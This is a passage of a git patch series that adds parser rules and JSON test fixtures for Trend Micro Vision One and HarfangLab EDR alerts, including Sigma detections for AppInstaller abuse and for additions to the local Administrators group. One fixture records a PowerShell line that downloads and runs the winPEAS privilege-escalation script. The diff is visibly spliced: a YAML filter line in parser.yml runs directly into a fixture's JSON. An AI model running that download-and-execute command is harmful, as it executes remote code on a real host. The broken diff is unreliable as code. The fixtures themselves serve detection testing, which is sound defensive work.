"ScriptBlockText": "IEX(New-Object 
Net.WebClient).downloadString('https://raw.githubusercontent.com/peass-ng/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1')" + } + }, + "host": { + "id": "e930412e-e09c-454b-a508-576ba266b9d8", + "ip": [ + "20.193.45.33" + ], + "name": "windows10" + }, + "observer": { + "product": "Vision One", + "vendor": "TrendMicro" + }, + "process": { + "command_line": "\"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\PowerShell_ISE.exe\" ", + "executable": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe", + "hash": { + "sha256": "440C8F6BC2F87D1932261D8F49D014CA330BC49EEBEAEEE59DA61790A2910EAF" + }, + "parent": { + "command_line": "C:\\Windows\\Explorer.EXE", + "pid": 9920 + }, + "pid": 5040 + }, + "related": { + "hash": [ + "440C8F6BC2F87D1932261D8F49D014CA330BC49EEBEAEEE59DA61790A2910EAF" + ], + "ip": [ + "20.193.45.33" + ], + "user": [ + "jdoe" + ] + }, + "rule": { + "name": "Possible Web Service Abuse" + }, + "trendmicro": { + "vision_one": { + "alert_id": "WB-11111-22222222-00000", + "investigation_status": "New", + "severity": "medium", + "status": "Open" + } + }, + "user": { + "domain": "windows10", + "id": "windows10\\jdoe", + "name": "jdoe" + } + } +} \ No newline at end of file From e88ee2f227504e1d060cad7568d9bf5a58b31b6c Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Thu, 28 Nov 2024 16:56:30 +0100 Subject: [PATCH 80/84] fix/Harfanglab --- HarfangLab/harfanglab/ingest/parser.yml | 225 ++++++++++++++++++++++- HarfangLab/harfanglab/tests/alert_4.json | 112 +++++++++++ HarfangLab/harfanglab/tests/alert_5.json | 88 +++++++++ 3 files changed, 424 insertions(+), 1 deletion(-) create mode 100644 HarfangLab/harfanglab/tests/alert_4.json create mode 100644 HarfangLab/harfanglab/tests/alert_5.json diff --git a/HarfangLab/harfanglab/ingest/parser.yml b/HarfangLab/harfanglab/ingest/parser.yml index 1376e0758..93671efde 100644 --- a/HarfangLab/harfanglab/ingest/parser.yml +++ b/HarfangLab/harfanglab/ingest/parser.yml 
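Review bot: The new fixture keeps a routable public address, `20.193.45.33`, in the raw message's `impactScope.entities[].entityValue.ips` and again in the expected `host.ip` and `related.ip`, while the other identifiers in the same message are already anonymised (`WB-11111-22222222-00000`, `windows10\\jdoe`, `e930412e-…`). Test data naming a real host tends to surface in CI logs and exported reports, so an RFC 5737 documentation address (for example `192.0.2.10`, substituted in all three places) would be the safer choice; the same remark applies to `19.112.87.74` in the preceding fixture. Indicator `id: 2` carries several kilobytes of script body that the expected output never maps (only indicator 1 feeds `action.properties.ScriptBlockText`), so if the parser does not depend on that value, truncating it to a short placeholder would keep the fixture readable. The file also ends without a trailing newline (`\ No newline at end of file`); adding one keeps the fixtures uniform for diff and formatting tooling.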
@@ -29,6 +29,14 @@ pipeline: input_field: "{{json_event.message.event_data.TaskContent}}" output_field: message + - name: parse_task_info_2 + filter: "{{json_event.message.eventlog.event_data.TaskContent != null and ':\\\\program files\\\\windowsapps\\\\microsoft.desktopappinstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\\\appinstaller.exe -servername:app.appx9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca\"],\"threat_key\":1343,\"groups\":[{\"id\":\"12345678-abcd-ef90-1234-123456abcdef\",\"name\":\"DOMAIN_Postes_de_travail_Windows\"}]}", + "sekoiaio": { + "intake": { + "dialect": "HarfangLab EDR", + "dialect_uuid": "3c7057d3-4689-4fae-8033-6f1f887a70f2" + } + } + }, + "expected": { + "message": "{\"log_type\":\"alert\",\"maturity\":\"stable\",\"alert_unique_id\":\"11111111-2222-3333-4444-555555555555\",\"alert_time\":\"2024-11-18T09:18:31.852+00:00\",\"@timestamp\":\"2024-11-18T09:18:31.852+00:00\",\"ingestion_date\":\"2024-11-18T09:18:31.852+00:00\",\"@event_create_date\":\"2024-11-18T09:18:31.558Z\",\"detection_date\":\"2024-11-18T09:18:31.558+00:00\",\"rule_name\":\"Package Installed via AppInstaller from the Internet\",\"rule_id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"msg\":\"Detects URL requests performed by AppInstaller in order to install a remote application.\\nAdversaries have been seen abusing the AppInstaller URI scheme (ms-appinstaller) to trick users into installing malicious software directly from Internet.\\nMicrosoft has disabled installation of remote package by default in late December 2023 but it can still be enabled via a group policy configuration.\\nIt is recommended to check if the accessed URL correspond to a known and legitimate application and if suspicious commands have been launched during the installation 
process.\\n\",\"type\":\"rtlogs\",\"alert_subtype\":\"process\",\"alert_type\":\"sigma\",\"status\":\"new\",\"level\":\"medium\",\"level_int\":30,\"execution\":0,\"quarantine\":4,\"details_url_request\":{\"url\":\"https://url.integration.com/test\",\"verb\":\"POST\",\"host\":\"url.integration.com\",\"event_time\":\"2024-11-18T09:18:30.550347Z\"},\"tags\":[\"attack.initial_access\",\"attack.t1189.001\"],\"mitre_cells\":[],\"agent\":{\"agentid\":\"11111111-aaaa-bbbb-cccc-222222222222\",\"hostname\":\"HOST01\",\"domain\":null,\"domainname\":\"DOMAINSI\",\"dnsdomainname\":\"intra.domain.fr\",\"ostype\":\"windows\",\"osversion\":\"10.0.19045\",\"distroid\":null,\"osproducttype\":\"Windows 10 Pro\",\"version\":\"4.2.10\",\"additional_info\":{}},\"process\":{\"commandline\":\"C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\\\AppInstaller.exe -ServerName:App.AppX9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca\",\"create_time\":\"2024-11-18T09:18:29.211Z\",\"current_directory\":\"C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\\\\",\"hashes\":{\"md5\":\"b4e821b2dac20d8d2ac6889f9c3fc315\",\"sha1\":\"a53b060cfb5e23508b4f9658d904cd7cb659de7f\",\"sha256\":\"3cc3cbf238e81e92242f4c5f422d85636d1771f2ebc781c2c8de5394f0741b45\"},\"image_name\":\"C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\\\AppInstaller.exe\",\"log_type\":\"process\",\"parent_commandline\":\"C:\\\\WINDOWS\\\\system32\\\\svchost.exe -k DcomLaunch 
-p\",\"parent_image\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"parent_unique_id\":\"aaaaaaaa-1111-bbbb-2222-cccccccccccc\",\"pid\":20188,\"ppid\":1332,\"process_name\":\"AppInstaller.exe\",\"process_unique_id\":\"11111111-aaaa-2222-bbbb-333333333333\",\"size\":2860064,\"username\":\"DOMAINSI\\\\JDOE\",\"grandparent_image\":\"C:\\\\Windows\\\\System32\\\\services.exe\",\"grandparent_commandline\":\"C:\\\\WINDOWS\\\\system32\\\\services.exe\",\"grandparent_unique_id\":\"66666666-7777-8888-9999-000000000000\",\"stacktrace\":\"\",\"stacktrace_minimal\":\"\",\"ancestors\":\"C:\\\\Windows\\\\System32\\\\svchost.exe|C:\\\\Windows\\\\System32\\\\services.exe|C:\\\\Windows\\\\System32\\\\wininit.exe\",\"usersid\":\"S-1-2-3-4-5\",\"integrity_level\":\"Low\",\"session\":1,\"logonid\":1686269,\"parent_integrity_level\":\"System\",\"grandparent_integrity_level\":\"System\",\"fake_ppid\":0,\"fake_parent_image\":\"\",\"fake_parent_commandline\":\"\",\"pe_info\":{\"company_name\":\"Microsoft Corporation\",\"file_description\":\"AppInstaller.exe\",\"file_version\":\"1.24.25180.00000\",\"internal_name\":\"AppInstaller\",\"legal_copyright\":\"\u00a9Microsoft Corporation. 
All rights reserved.\",\"original_filename\":\"AppInstaller.exe\",\"pe_timestamp\":\"2024-10-25T23:14:08.000Z\",\"product_name\":\"Microsoft Desktop App Installer\",\"product_version\":\"1.24.25180.0\"},\"signed\":true,\"signature_info\":{\"signer_info\":{\"serial_number\":\"1234567890\",\"thumbprint\":\"8f985be8fd256085c90a95d3c74580511a1db975\",\"thumbprint_sha256\":\"e4ab39116a7dc57d073164eb1c840b1fb8334a8c920b92efafea19112dce643b\",\"issuer_name\":\"Microsoft Code Signing PCA 2011\",\"display_name\":\"Microsoft Corporation\"},\"root_info\":{\"serial_number\":\"abcdef12\",\"thumbprint\":\"8f43288ad272f3103b6fb1428485ea3014c0bcfe\",\"thumbprint_sha256\":\"847df6a78497943f27fc72eb93f9a637320a02b561d0a91b09e87a7807ed7c61\",\"issuer_name\":\"Microsoft Root Certificate Authority 2011\",\"display_name\":\"Microsoft Root Certificate Authority 2011\"},\"signed_authenticode\":true,\"signed_catalog\":false},\"pe_timestamp_int\":1729898048,\"pe_timestamp\":\"2024-10-25T23:14:08.000Z\",\"pe_imphash\":\"714FD4ADFC932C947A3949463867BE18\",\"dont_create_process\":true,\"status\":0,\"detection_timestamp\":\"2024-11-18T09:18:31.558Z\",\"system_event_type\":\"url_request_event\",\"ioc_matches\":[],\"log_platform_flag\":0,\"sigma_rule_content\":\"title: \\\"Package Installed via AppInstaller from the Internet\\\"\\nid: aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\\ndescription: |\\n Detects URL requests performed by AppInstaller in order to install a remote application.\\n Adversaries have been seen abusing the AppInstaller URI scheme (ms-appinstaller) to trick users into installing malicious software directly from Internet.\\n Microsoft has disabled installation of remote package by default in late December 2023 but it can still be enabled via a group policy configuration.\\n It is recommended to check if the accessed URL correspond to a known and legitimate application and if suspicious commands have been launched during the installation process.\\nreferences:\\n - 
https://www.microsoft.com/en-us/security/blog/2023/12/28/financially-motivated-threat-actors-misusing-app-installer/\\n - https://learn.microsoft.com/en-us/windows/msix/app-installer/installing-windows10-apps-web\\n - https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/\\n - https://attack.mitre.org/techniques/T1189/\\nstatus: stable\\ndate: 2023/12/28\\nmodified: 2024/01/10\\nauthor: HarfangLab\\ntags:\\n - attack.initial_access\\n - attack.t1189.001\\nlogsource:\\n product: windows\\n category: url_request\\ndetection:\\n selection:\\n ProcessOriginalFileName: AppInstaller.exe\\n ProcessCommandLine|contains: -ServerName:App.AppX9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca\\n\\n exclusion_knownurl:\\n RequestUrlHost:\\n - download.mytobiidynavox.com # Snap.Windows.WinUI.OEM_1.30.0.3621.msixbundle\\n - windbg.download.prss.microsoft.com # windbg.appinstaller\\n - languagetool.org # Languagetool.Packaging_0.5.3.5_x64.msixbundle\\n - staticcdn.duckduckgo.com # DuckDuckGo_0.61.5.0.msixbundle\\n condition: selection and not 1 of exclusion_*\\nlevel: medium\"},\"detection_origin\":\"agent\",\"image_name\":\"C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\\\AppInstaller.exe\",\"rule_content\":\"title: \\\"Package Installed via AppInstaller from the Internet\\\"\\nid: aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\\ndescription: |\\n Detects URL requests performed by AppInstaller in order to install a remote application.\\n Adversaries have been seen abusing the AppInstaller URI scheme (ms-appinstaller) to trick users into installing malicious software directly from Internet.\\n Microsoft has disabled installation of remote package by default in late December 2023 but it can still be enabled via a group policy configuration.\\n It is recommended to check if the accessed URL correspond to a known and legitimate application and if suspicious commands have been launched during the installation process.\\nreferences:\\n - 
https://www.microsoft.com/en-us/security/blog/2023/12/28/financially-motivated-threat-actors-misusing-app-installer/\\n - https://learn.microsoft.com/en-us/windows/msix/app-installer/installing-windows10-apps-web\\n - https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/\\n - https://attack.mitre.org/techniques/T1189/\\nstatus: stable\\ndate: 2023/12/28\\nmodified: 2024/01/10\\nauthor: HarfangLab\\ntags:\\n - attack.initial_access\\n - attack.t1189.001\\nlogsource:\\n product: windows\\n category: url_request\\ndetection:\\n selection:\\n ProcessOriginalFileName: AppInstaller.exe\\n ProcessCommandLine|contains: -ServerName:App.AppX9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca\\n\\n exclusion_knownurl:\\n RequestUrlHost:\\n - download.mytobiidynavox.com # Snap.Windows.WinUI.OEM_1.30.0.3621.msixbundle\\n - windbg.download.prss.microsoft.com # windbg.appinstaller\\n - languagetool.org # Languagetool.Packaging_0.5.3.5_x64.msixbundle\\n - staticcdn.duckduckgo.com # DuckDuckGo_0.61.5.0.msixbundle\\n condition: selection and not 1 of exclusion_*\\nlevel: medium\",\"aggregation_key\":\"1609170aa71e23cf15ca43adc927697e071c4a4207f8d4fc9d74f7382b4e9b9c\",\"threat_type\":\"commandline\",\"threat_values\":[\":\\\\program files\\\\windowsapps\\\\microsoft.desktopappinstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\\\appinstaller.exe -servername:app.appx9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca\"],\"threat_key\":1343,\"groups\":[{\"id\":\"12345678-abcd-ef90-1234-123456abcdef\",\"name\":\"DOMAIN_Postes_de_travail_Windows\"}]}", + "event": { + "category": [ + "process" + ], + "dataset": "alert", + "kind": "alert", + "type": [ + "start" + ] + }, + "@timestamp": "2024-11-18T09:18:31.558000Z", + "agent": { + "id": "11111111-aaaa-bbbb-cccc-222222222222", + "name": "harfanglab" + }, + "file": { + "hash": { + "md5": "b4e821b2dac20d8d2ac6889f9c3fc315", + "sha1": "a53b060cfb5e23508b4f9658d904cd7cb659de7f", + "sha256": "3cc3cbf238e81e92242f4c5f422d85636d1771f2ebc781c2c8de5394f0741b45" + } + }, + 
"harfanglab": { + "aggregation_key": "1609170aa71e23cf15ca43adc927697e071c4a4207f8d4fc9d74f7382b4e9b9c", + "alert_subtype": "process", + "alert_time": "2024-11-18T09:18:31.852+00:00", + "alert_unique_id": "11111111-2222-3333-4444-555555555555", + "execution": 0, + "groups": [ + "{\"id\": \"12345678-abcd-ef90-1234-123456abcdef\", \"name\": \"DOMAIN_Postes_de_travail_Windows\"}" + ], + "level": "medium", + "status": "new" + }, + "host": { + "domain": "DOMAINSI", + "hostname": "HOST01", + "name": "HOST01", + "os": { + "full": "Windows 10 Pro", + "version": "10.0.19045" + } + }, + "log": { + "hostname": "HOST01" + }, + "process": { + "command_line": "C:\\Program Files\\WindowsApps\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\AppInstaller.exe -ServerName:App.AppX9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca", + "executable": "C:\\Program Files\\WindowsApps\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\AppInstaller.exe", + "name": "AppInstaller.exe", + "parent": { + "command_line": "C:\\WINDOWS\\system32\\svchost.exe -k DcomLaunch -p", + "executable": "C:\\Windows\\System32\\svchost.exe" + }, + "pe": { + "company": "Microsoft Corporation", + "description": "AppInstaller.exe", + "file_version": "1.24.25180.00000", + "imphash": "714FD4ADFC932C947A3949463867BE18", + "original_file_name": "AppInstaller.exe", + "product": "Microsoft Desktop App Installer" + }, + "pid": 20188, + "working_directory": "C:\\Program Files\\WindowsApps\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\" + }, + "related": { + "hash": [ + "3cc3cbf238e81e92242f4c5f422d85636d1771f2ebc781c2c8de5394f0741b45", + "a53b060cfb5e23508b4f9658d904cd7cb659de7f", + "b4e821b2dac20d8d2ac6889f9c3fc315" + ], + "hosts": [ + "HOST01" + ], + "user": [ + "DOMAINSI\\JDOE" + ] + }, + "rule": { + "category": "sigma", + "description": "Detects URL requests performed by AppInstaller in order to install a remote application.\nAdversaries have been seen abusing the AppInstaller URI 
scheme (ms-appinstaller) to trick users into installing malicious software directly from Internet.\nMicrosoft has disabled installation of remote package by default in late December 2023 but it can still be enabled via a group policy configuration.\nIt is recommended to check if the accessed URL correspond to a known and legitimate application and if suspicious commands have been launched during the installation process.\n", + "id": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee", + "name": "Package Installed via AppInstaller from the Internet" + }, + "url": { + "domain": "url.integration.com", + "original": "https://url.integration.com/test", + "path": "/test", + "port": 443, + "registered_domain": "integration.com", + "scheme": "https", + "subdomain": "url", + "top_level_domain": "com" + }, + "user": { + "name": "DOMAINSI\\JDOE", + "roles": "DOMAIN_Postes_de_travail_Windows" + } + } +} \ No newline at end of file diff --git a/HarfangLab/harfanglab/tests/alert_5.json b/HarfangLab/harfanglab/tests/alert_5.json new file mode 100644 index 000000000..0f68a7c8c --- /dev/null +++ b/HarfangLab/harfanglab/tests/alert_5.json 
@@ -0,0 +1,88 @@ +{ + "input": { + "message": "{\"type\": \"rtlogs\", \"level\": \"medium\", \"maturity\": \"stable\", \"quarantine\": 4, \"rule_content\": \"title: User Account Added to the Local Administrators Group\\nid: 12345678-abcd-ef90-1234-123456abcdef\\ndescription: \\\"Detects when a user account is added into the local Administrators group.\\\\n\\nThis action can be the result of a malicious activity.\\\"\\nreferences:\\n - https://attack.mitre.org/techniques/T1098/\\n - https://attack.mitre.org/techniques/T1078/003/\\nstatus: stable\\ndate: 2021/04/28\\nmodified: 2021/01/10\\nauthor: HarfangLab\\ntags:\\n - attack.persistence\\n - attack.t1098\\n - attack.privilege_escalation\\n - attack.t1078.003\\nlogsource:\\n product: windows\\n service: security\\ndetection:\\n selection:\\n EventID: 4732\\n GroupSid: S-1-2-3-4\\n exclusion:\\n - MemberSid: S-1-2-4-*-512 # avoid detection when a computer joined a domain (domain admins sid)\\n - SubjectUserName|endswith: \\n condition: selection and not exclusion\\nfalsepositives:\\n - Legitimate administrator action\\nlevel: medium\", \"alert_time\": \"2024-11-12T08:39:14.017+00:00\", \"rule_name\": \"User Account Added to the Local Administrators Group\", \"tags\": [\"attack.persistence\", \"attack.privilege_escalation\", \"attack.t1078.003\", \"attack.t1098\"], \"level_int\": 30, \"eventlog\": {\"level\": \"log_always\", \"type\": \"wineventlog\", \"detection_timestamp\": \"2024/11/12 08:39:13.967\", \"event_id\": 4732, \"event_data\": {\"SubjectUserSid\": \"S-1-2-4-5-6\", \"SubjectDomainName\": \"NT_DOMAIN\", \"PrivilegeList\": \"-\", \"TargetDomainName\": \"Builtin\", \"TargetUserName\": \"Administrateurs\", \"MemberSid\": \"S-1-2-4-7-8\", \"MemberName\": \"NT_DOMAIN\\\\DOEJ\", \"SubjectUserName\": \"sw-suser\", \"TargetSid\": \"S-1-2-3-4\", \"SubjectLogonId\": \"0x1234567\"}, \"record_number\": 174136362, \"event_date\": \"2024-11-12T08:39:13.205Z\", \"sigma_rule_content\": \"title: User Account Added to the 
Local Administrators Group\\nid: 12345678-abcd-ef90-1234-123456abcdef\\ndescription: \\\"Detects when a user account is added into the local Administrators group.\\\\n\\nThis action can be the result of a malicious activity.\\\"\\nreferences:\\n - https://attack.mitre.org/techniques/T1098/\\n - https://attack.mitre.org/techniques/T1078/003/\\nstatus: stable\\ndate: 2021/04/28\\nmodified: 2021/01/10\\nauthor: HarfangLab\\ntags:\\n - attack.persistence\\n - attack.t1098\\n - attack.privilege_escalation\\n - attack.t1078.003\\nlogsource:\\n product: windows\\n service: security\\ndetection:\\n selection:\\n EventID: 4732\\n GroupSid: S-1-2-3-4\\n exclusion:\\n - MemberSid: S-1-2-4-*-512 # avoid detection when a computer joined a domain (domain admins sid)\\n - SubjectUserName|endswith: \\n condition: selection and not exclusion\\nfalsepositives:\\n - Legitimate administrator action\\nlevel: medium\", \"source_name\": \"Microsoft-Windows-Security-Auditing\", \"dont_create_eventlog\": true, \"user\": {\"domain\": \"\", \"name\": \"\", \"type\": \"unknown\", \"identifier\": \"\"}, \"thread_id\": 1728, \"log_name\": \"Security\", \"process_id\": 1224, \"status\": 0, \"ioc_matches\": [], \"provider_guid\": \"54849625-5478-4994-a5ba-3e3b0328c30d\", \"keywords\": [\"AuditSuccess\", \"ReservedKeyword63\"], \"log_type\": \"eventlog\", \"computer_name\": \"PC01.domain.com\", \"user_data\": {}, \"system_event_type\": \"event_log_event\"}, \"threat_values\": [], \"destination\": \"syslog\", \"@timestamp\": \"2024-11-12T08:39:14.017Z\", \"detection_date\": \"2024-11-12T08:39:13.967+00:00\", \"@event_create_date\": \"2024-11-12T08:39:14.017Z\", \"aggregation_key\": \"8415b902c507b98714301b4ab6633009fbf2728c0cfaf61637c5e903627e4ebb\", \"alert_type\": \"sigma\", \"rule_id\": \"12345678-abcd-ef90-1234-123456abcdef\", \"ingestion_date\": \"2024-11-12T08:39:14.017+00:00\", \"tenant\": \"3b37ffc8520ef542\", \"threat_type\": \"new\", \"groups\": [{\"name\": \"Postes de travail\", \"id\": 
\"11111111-2222-3333-4444-555555555555\"}, {\"name\": \"Postes de travail : Lot 3\", \"id\": \"66666666-7777-8888-9999-000000000000\"}], \"status\": \"new\", \"execution\": 0, \"agent\": {\"agentid\": \"11111111-aaaa-2222-bbbb-333333333333\", \"domain\": null, \"osproducttype\": \"Windows 10 Enterprise\", \"ostype\": \"windows\", \"dnsdomainname\": \"domain.com\", \"distroid\": null, \"domainname\": \"NT_DOMAIN\", \"osversion\": \"10.0.19045\", \"hostname\": \"PC01\", \"version\": \"4.1.6\", \"additional_info\": {}}, \"threat_key\": \"20528\", \"mitre_cells\": [\"persistence__t1078.003\", \"persistence__t1098\", \"privilege-escalation__t1078.003\", \"privilege-escalation__t1098\"], \"alert_unique_id\": \"aaaaaaaa-1111-bbbb-2222-cccccccccccc\", \"log_type\": \"alert\", \"@version\": \"1\", \"msg\": \"Detects when a user account is added into the local Administrators group.\\n This action can be the result of a malicious activity.\", \"alert_subtype\": \"eventlog\", \"detection_origin\": \"agent\"}", + "sekoiaio": { + "intake": { + "dialect": "HarfangLab EDR", + "dialect_uuid": "3c7057d3-4689-4fae-8033-6f1f887a70f2" + } + } + }, + "expected": { + "message": "{\"type\": \"rtlogs\", \"level\": \"medium\", \"maturity\": \"stable\", \"quarantine\": 4, \"rule_content\": \"title: User Account Added to the Local Administrators Group\\nid: 12345678-abcd-ef90-1234-123456abcdef\\ndescription: \\\"Detects when a user account is added into the local Administrators group.\\\\n\\nThis action can be the result of a malicious activity.\\\"\\nreferences:\\n - https://attack.mitre.org/techniques/T1098/\\n - https://attack.mitre.org/techniques/T1078/003/\\nstatus: stable\\ndate: 2021/04/28\\nmodified: 2021/01/10\\nauthor: HarfangLab\\ntags:\\n - attack.persistence\\n - attack.t1098\\n - attack.privilege_escalation\\n - attack.t1078.003\\nlogsource:\\n product: windows\\n service: security\\ndetection:\\n selection:\\n EventID: 4732\\n GroupSid: S-1-2-3-4\\n exclusion:\\n - MemberSid: 
S-1-2-4-*-512 # avoid detection when a computer joined a domain (domain admins sid)\\n - SubjectUserName|endswith: \\n condition: selection and not exclusion\\nfalsepositives:\\n - Legitimate administrator action\\nlevel: medium\", \"alert_time\": \"2024-11-12T08:39:14.017+00:00\", \"rule_name\": \"User Account Added to the Local Administrators Group\", \"tags\": [\"attack.persistence\", \"attack.privilege_escalation\", \"attack.t1078.003\", \"attack.t1098\"], \"level_int\": 30, \"eventlog\": {\"level\": \"log_always\", \"type\": \"wineventlog\", \"detection_timestamp\": \"2024/11/12 08:39:13.967\", \"event_id\": 4732, \"event_data\": {\"SubjectUserSid\": \"S-1-2-4-5-6\", \"SubjectDomainName\": \"NT_DOMAIN\", \"PrivilegeList\": \"-\", \"TargetDomainName\": \"Builtin\", \"TargetUserName\": \"Administrateurs\", \"MemberSid\": \"S-1-2-4-7-8\", \"MemberName\": \"NT_DOMAIN\\\\DOEJ\", \"SubjectUserName\": \"sw-suser\", \"TargetSid\": \"S-1-2-3-4\", \"SubjectLogonId\": \"0x1234567\"}, \"record_number\": 174136362, \"event_date\": \"2024-11-12T08:39:13.205Z\", \"sigma_rule_content\": \"title: User Account Added to the Local Administrators Group\\nid: 12345678-abcd-ef90-1234-123456abcdef\\ndescription: \\\"Detects when a user account is added into the local Administrators group.\\\\n\\nThis action can be the result of a malicious activity.\\\"\\nreferences:\\n - https://attack.mitre.org/techniques/T1098/\\n - https://attack.mitre.org/techniques/T1078/003/\\nstatus: stable\\ndate: 2021/04/28\\nmodified: 2021/01/10\\nauthor: HarfangLab\\ntags:\\n - attack.persistence\\n - attack.t1098\\n - attack.privilege_escalation\\n - attack.t1078.003\\nlogsource:\\n product: windows\\n service: security\\ndetection:\\n selection:\\n EventID: 4732\\n GroupSid: S-1-2-3-4\\n exclusion:\\n - MemberSid: S-1-2-4-*-512 # avoid detection when a computer joined a domain (domain admins sid)\\n - SubjectUserName|endswith: \\n condition: selection and not exclusion\\nfalsepositives:\\n - Legitimate 
administrator action\\nlevel: medium\", \"source_name\": \"Microsoft-Windows-Security-Auditing\", \"dont_create_eventlog\": true, \"user\": {\"domain\": \"\", \"name\": \"\", \"type\": \"unknown\", \"identifier\": \"\"}, \"thread_id\": 1728, \"log_name\": \"Security\", \"process_id\": 1224, \"status\": 0, \"ioc_matches\": [], \"provider_guid\": \"54849625-5478-4994-a5ba-3e3b0328c30d\", \"keywords\": [\"AuditSuccess\", \"ReservedKeyword63\"], \"log_type\": \"eventlog\", \"computer_name\": \"PC01.domain.com\", \"user_data\": {}, \"system_event_type\": \"event_log_event\"}, \"threat_values\": [], \"destination\": \"syslog\", \"@timestamp\": \"2024-11-12T08:39:14.017Z\", \"detection_date\": \"2024-11-12T08:39:13.967+00:00\", \"@event_create_date\": \"2024-11-12T08:39:14.017Z\", \"aggregation_key\": \"8415b902c507b98714301b4ab6633009fbf2728c0cfaf61637c5e903627e4ebb\", \"alert_type\": \"sigma\", \"rule_id\": \"12345678-abcd-ef90-1234-123456abcdef\", \"ingestion_date\": \"2024-11-12T08:39:14.017+00:00\", \"tenant\": \"3b37ffc8520ef542\", \"threat_type\": \"new\", \"groups\": [{\"name\": \"Postes de travail\", \"id\": \"11111111-2222-3333-4444-555555555555\"}, {\"name\": \"Postes de travail : Lot 3\", \"id\": \"66666666-7777-8888-9999-000000000000\"}], \"status\": \"new\", \"execution\": 0, \"agent\": {\"agentid\": \"11111111-aaaa-2222-bbbb-333333333333\", \"domain\": null, \"osproducttype\": \"Windows 10 Enterprise\", \"ostype\": \"windows\", \"dnsdomainname\": \"domain.com\", \"distroid\": null, \"domainname\": \"NT_DOMAIN\", \"osversion\": \"10.0.19045\", \"hostname\": \"PC01\", \"version\": \"4.1.6\", \"additional_info\": {}}, \"threat_key\": \"20528\", \"mitre_cells\": [\"persistence__t1078.003\", \"persistence__t1098\", \"privilege-escalation__t1078.003\", \"privilege-escalation__t1098\"], \"alert_unique_id\": \"aaaaaaaa-1111-bbbb-2222-cccccccccccc\", \"log_type\": \"alert\", \"@version\": \"1\", \"msg\": \"Detects when a user account is added into the local 
Administrators group.\\n This action can be the result of a malicious activity.\", \"alert_subtype\": \"eventlog\", \"detection_origin\": \"agent\"}", + "event": { + "dataset": "alert", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-12T08:39:14.017000Z", + "action": { + "properties": { + "MemberName": "DOEJ", + "SubjectDomainName": "NT_DOMAIN", + "SubjectLogonId": "0x1234567", + "SubjectUserName": "sw-suser", + "SubjectUserSid": "S-1-2-4-5-6", + "TargetDomainName": "Builtin", + "TargetSid": "S-1-2-3-4", + "TargetUserName": "Administrateurs" + } + }, + "agent": { + "id": "11111111-aaaa-2222-bbbb-333333333333", + "name": "harfanglab" + }, + "harfanglab": { + "aggregation_key": "8415b902c507b98714301b4ab6633009fbf2728c0cfaf61637c5e903627e4ebb", + "alert_subtype": "eventlog", + "alert_time": "2024-11-12T08:39:14.017+00:00", + "alert_unique_id": "aaaaaaaa-1111-bbbb-2222-cccccccccccc", + "execution": 0, + "groups": [ + "{\"id\": \"11111111-2222-3333-4444-555555555555\", \"name\": \"Postes de travail\"}", + "{\"id\": \"66666666-7777-8888-9999-000000000000\", \"name\": \"Postes de travail : Lot 3\"}" + ], + "level": "medium", + "status": "new" + }, + "host": { + "domain": "NT_DOMAIN", + "hostname": "PC01", + "name": "PC01", + "os": { + "full": "Windows 10 Enterprise", + "version": "10.0.19045" + } + }, + "log": { + "hostname": "PC01" + }, + "organization": { + "id": "3b37ffc8520ef542" + }, + "related": { + "hosts": [ + "PC01" + ], + "user": [ + "sw-suser" + ] + }, + "rule": { + "category": "sigma", + "description": "Detects when a user account is added into the local Administrators group.\n This action can be the result of a malicious activity.", + "id": "12345678-abcd-ef90-1234-123456abcdef", + "name": "User Account Added to the Local Administrators Group" + }, + "user": { + "domain": "NT_DOMAIN", + "name": "sw-suser", + "roles": "Postesdetravail,Postesdetravail:Lot3", + "target": { + "domain": "Builtin", + "name": "Administrateurs" + } + } + } +} \ No newline at 
end of file
From ce88fe4040225391a5378a96ae5662a97725203a Mon Sep 17 00:00:00 2001
From: Sebastien Quioc
Date: Fri, 29 Nov 2024 17:16:26 +0100
Subject: [PATCH 81/84] fix(Harfanglab): add event.kind: 'alert' for harfanglab alerts
---
 HarfangLab/harfanglab/ingest/parser.yml | 1 +
 HarfangLab/harfanglab/tests/alert_5.json | 1 +
 2 files changed, 2 insertions(+)
diff --git a/HarfangLab/harfanglab/ingest/parser.yml b/HarfangLab/harfanglab/ingest/parser.yml
index 93671efde..5050c7429 100644
--- a/HarfangLab/harfanglab/ingest/parser.yml
+++ b/HarfangLab/harfanglab/ingest/parser.yml
@@ -229,6 +229,7 @@ stages:
 alert_info:
 actions:
 - set:
+ event.kind: "alert"
 harfanglab.level: "{{json_event.message.level}}"
 rule.description: "{{json_event.message.msg}}"
 rule.name: "{{json_event.message.rule_name}}"
diff --git a/HarfangLab/harfanglab/tests/alert_5.json b/HarfangLab/harfanglab/tests/alert_5.json
index 0f68a7c8c..19abfe567 100644
